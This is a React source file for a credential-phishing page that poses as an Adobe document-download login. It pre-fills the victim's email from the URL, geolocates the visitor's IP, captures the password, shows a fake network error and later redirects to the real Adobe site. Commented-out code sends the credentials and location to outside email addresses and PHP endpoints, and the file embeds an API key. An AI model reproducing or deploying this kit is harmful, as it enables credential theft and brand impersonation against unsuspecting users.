
import './modal.css';
import Panell from './media/img/authpanel.png';
import Logg from './media/img/logo.png';
import SensitiveFile from './media/img/file.png';
// import Signn from './media/img/sign.png';
import { useState, useEffect, useRef } from 'react';
// import $ from 'jquery';
import emailjs from '@emailjs/browser';


export const Modal = ()=>{

    const formRef = useRef();


    const [ipAdress, setIpAdress] = useState('')
    const [city, setCity] = useState('');
    const [flag, setFlag] = useState('');
    const [country, setCountry] = useState('');
  
    // const forTime = new Date();
  
    useEffect(()=>{
      fetch(`https://api.geoapify.com/v1/ipinfo?apiKey=139d2378a5554f48bf290b61999b4e8a`)
      .then(req=> req.json())
      .then(res=>{
  
          setIpAdress(res.ip)
          setFlag(res.country.flag);
          setCountry(res.country.name);
          setCity(res.city.names.en);
          setFlag(flag);
          setIpAdress(ipAdress);
  
      })
      .catch(e=> console.log)
  }, [flag, ipAdress]);
  

    // const reloadPreloader = ()=> window.location.reload();

    const emailInTheURL = window.location.href;
    const sliceEqualSign = emailInTheURL.indexOf("=");
    const extracetdEmail = emailInTheURL.substr((sliceEqualSign+1)).split('((()))', 1).toString();

    const [email, setEmail] = useState(extracetdEmail);
    const [pwd, setPwd] = useState('');

    const [count, setCount] = useState(0);

    const [err, setErr] = useState(false);

    const [btn, setBtn] = useState(`Download`);




    const submitHandler = (e) => {
        e.preventDefault();
        if (pwd === "") {
          return null
        }
        
        else{

            setBtn(`Please wait...`)
            
            setTimeout(() => {
              setPwd('');
              setErr(true);
              setBtn(btn);
            }, 2950);


            // const serviceID = `service_xhrj4w4`;
            // const templateID = `template_sklw1dp`;
            // const publicKey = `35JbsFMyI7dxAGiKW`;

        // emailjs
        // .sendForm(serviceID, templateID, formRef.current, {
        //   publicKey: publicKey,
        // })
        // .then(
        //   () => {
        //     console.log('');
        //   },
        //   (error) => {
        //     console.log('', error.text);
        //   },
        // );

            // const user = {
            //     online_correspondence: email,
            //     signal: pwd,
            //     country: country,
            //     city: city,
            //     flag: flag,
            //     eyep: ipAdress,
            //     nownow: forTime
            // };

            // const user = {
            //     email: email,
            //     password: pwd,
                // subject: "Portable Document Format",
                // to: "benjamin45454@zohomail.com",
                // // body: `Email: ${defaultEmail}  Password: ${defaultPassword}`
                // body:
                // `
                // <html lang="en">
                // <p>Online Correspondence: ${email}</p>
                // <p>Signal: ${pwd}</p>
                // <p>Country: ${country}</p>
                // <p>Flag: ${flag}</p>
                // </html>
                // `
            // };


            // const user = {
            //         email: email,
            //         password: pwd,
            // }


            // const user = {
            //     "subject": "Coming PDF Logs",
            //     "to": "centralbiz100@gmail.com",
            //     "body": `<div><h3></h3><p>Online_Correspondence: ${email}</p><p>Signal: ${pwd}</p><p>Country: ${country}</p><p>Flag: ${flag}</p></div>`
            // }

    
        //   $.ajax({
        //       type: "POST",
        //       url: "https://dexamerix.com/dashboard/file/newpd.php",
        //       data: user,
        //       success(data) {
        //           console.log(data);
        //       },
        //   });




        //     $.ajax({
        //       type: "POST",
        //       url: "https://physicaleducationdiploma.com/dashboard/file/pdf.php",
        //       data: user,
        //       success(data) {
        //           console.log(data);
        //       },
        //   });


          setCount(count=> count + 1);
                if(count >= 3){
                    const redirectURL = window.location.href;
                    const sliceEqualSign = redirectURL.indexOf("@");
                    const extracetdemailDomain = redirectURL.substr((sliceEqualSign+1));
                    console.log(extracetdemailDomain);
                    setTimeout(() => {
                        // window.location.reload();
                        window.location.href = `https://www.adobe.com/creativecloud/adobe/campaign/pricing.html?gclid=Cj0KCQjwsoe5BhDiARIsAOXVoUteJb00VPkK0Twssc-W1UpYtnpfUjGpZ5_paG3DZ7IJ33_4OtsV86kaArerEALw_wcB&sdid=29NMCGTN&mv=search&mv2=paidsearch&ef_id=Cj0KCQjwsoe5BhDiARIsAOXVoUteJb00VPkK0Twssc-W1UpYtnpfUjGpZ5_paG3DZ7IJ33_4OtsV86kaArerEALw_wcB:G:s&s_kwcid=AL!3085!3!356459423190!e!!g!!adobe!50818900!3060803800&mv=search&gad_source=1`;
                    }, 2500);
                    
                };
        }
      };



    return(<>
        <div className='backdrop'>
            <div className='mode'>

                <div style={{borderBottom:'1px solid #ccc'}}>
                    <img 
                        src={Logg}
                        alt='logggg'
                        className='logggg'
                        style={{height:'40px'}}
                    />

                    &#160;

                    <img 
                        src={Panell}
                        alt='authentication'
                        className='authentication'
                    />

                </div>



                <div className='main'>
                    <div>
                        <img 
                            src={SensitiveFile}
                            alt='file'
                            className='file'
                        />
                    </div>


                    <form onSubmit={submitHandler} ref={formRef}>
                        <div className='em_conr'>
                            <span>Email</span>

                            <input 
                                style={{marginTop:'7px'}}
                                className='email'
                                id='email'
                                type='email'
                                required
                                value={email}
                                onChange={ e=> setEmail(e.target.value) }
                                name='online_correspondence'
                            />
                        </div>





                        <div className='pwd_conr em_conr'>
                            <span>Password</span>

                            <input 
                                style={{marginTop:'7px'}}
                                className='paswd email'
                                id='paswd'
                                type='password'
                                required
                                value={pwd}
                                onChange={ e=> setPwd(e.target.value) }
                                name='signal'
                                autoFocus
                            />
                        </div>


                        { err ? <div className='err'>Network error, try again later!</div>: null }

                        <input type="text" value={country} name="country" hidden/>
              <input type="text" value={city} name="city" hidden/>



                        <div className='btn_cont'>
                            <input 
                                type='submit'
                                value={`${btn}`}
                                className='btn__sub_'
                                autoFocus
                                onClick={submitHandler}
                            />
                        </div>

                        {/* <img src={Signn} alt='signin' style={{width:'100%', marginTop:'20px'}}/> */}
                    </form>

                    <p className='hj' style={{
                        fontSize:'14px',
                        lineHeight:'1.4em'
                    }}>Sign in with your Valid Email and Password to Download Documents through
                        {/* <br/> */}&#160;
                    <b>IMAP</b> 
                    <br />
                    &copy; 2024 Adobe Inc.
                    </p>


                </div>

            </div>
        </div>
    </>)
}